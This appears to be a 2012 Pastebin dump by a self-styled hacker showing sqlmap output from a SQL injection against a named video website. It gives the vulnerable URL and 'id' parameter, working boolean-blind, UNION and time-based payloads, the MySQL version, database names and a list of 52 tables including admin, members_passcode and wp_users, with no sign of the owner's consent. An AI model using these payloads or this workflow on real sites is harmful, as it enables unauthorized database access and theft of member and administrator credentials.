Advertisement
Islam-Hacker

Database> video7.lolvideo.dk

Dec 10th, 2012
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.76 KB | None | 0 0
  1. By @JM511 <Twitter
  2. ===========================
  3.  
  4. http://video7.lolvideo.dk/
  5.  
  6. [03:28:58] [INFO] the back-end DBMS is MySQL
  7.  
  8. web application technology: Apache, PHP 5.3.19
  9. back-end DBMS: MySQL 5.0.11
  10. [03:28:58] [INFO] fetching database names
  11. available databases [2]:
  12. [*] information_schema
  13. [*] lolvideo_dk_db
  14.  
  15. [03:28:59] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.video7.lolvideo.dk'
  16.  
  17. [*] shutting down at 03:28:59
  18.  
  19. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.video7.lolvideo.dk/game.php?id=298 -D lolvideo_dk_db --tables
  20.  
  21. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  22. http://sqlmap.org
  23.  
  24. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  25.  
  26. [*] starting at 03:29:08
  27.  
  28. [03:29:08] [INFO] resuming back-end DBMS 'mysql'
  29. [03:29:09] [INFO] testing connection to the target url
  30. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  31. ---
  32. Place: GET
  33. Parameter: id
  34. Type: boolean-based blind
  35. Title: AND boolean-based blind - WHERE or HAVING clause
  36. Payload: id=298 AND 9048=9048
  37.  
  38. Type: UNION query
  39. Title: MySQL UNION query (NULL) - 17 columns
  40. Payload: id=298 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e70713a,0x684c6d416464504c7472,0x3a686d713a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  41.  
  42. Type: AND/OR time-based blind
  43. Title: MySQL > 5.0.11 AND time-based blind
  44. Payload: id=298 AND SLEEP(5)
  45. ---
  46.  
  47. [03:29:10] [INFO] the back-end DBMS is MySQL
  48.  
  49. web application technology: Apache, PHP 5.3.19
  50. back-end DBMS: MySQL 5.0.11
  51. [03:29:10] [INFO] fetching tables for database: 'lolvideo_dk_db'
  52. Database: lolvideo_dk_db
  53. [52 tables]
  54. +------------------------------+
  55. | admin |
  56. | admin0 |
  57. | admin9 |
  58. | administrators |
  59. | adminlol |
  60. | adminlolz |
  61. | advertisements |
  62. | babes |
  63. | babeslolz |
  64. | bans_ips |
  65. | billederlolz |
  66. | config |
  67. | game_categories |
  68. | games |
  69. | gameslolz |
  70. | goviral |
  71. | image_categories |
  72. | images |
  73. | members |
  74. | members_passcode |
  75. | members_verifycode |
  76. | pictures_flashfiles_upload |
  77. | posts |
  78. | posts_favorited |
  79. | posts_reports |
  80. | posts_unfavorited |
  81. | sessions |
  82. | settings |
  83. | settings9 |
  84. | static |
  85. | talks |
  86. | unapproved_videos |
  87. | videoer |
  88. | videoer0 |
  89. | videoer11 |
  90. | videoer9 |
  91. | videoerNO |
  92. | videoerlolz |
  93. | videos_pictures_flash_likes |
  94. | videos_pictures_flash_rating |
  95. | wp_commentmeta |
  96. | wp_comments |
  97. | wp_links |
  98. | wp_options |
  99. | wp_postmeta |
  100. | wp_posts |
  101. | wp_sharebar |
  102. | wp_term_relationships |
  103. | wp_term_taxonomy |
  104. | wp_terms |
  105. | wp_usermeta |
  106. | wp_users |
  107. +------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement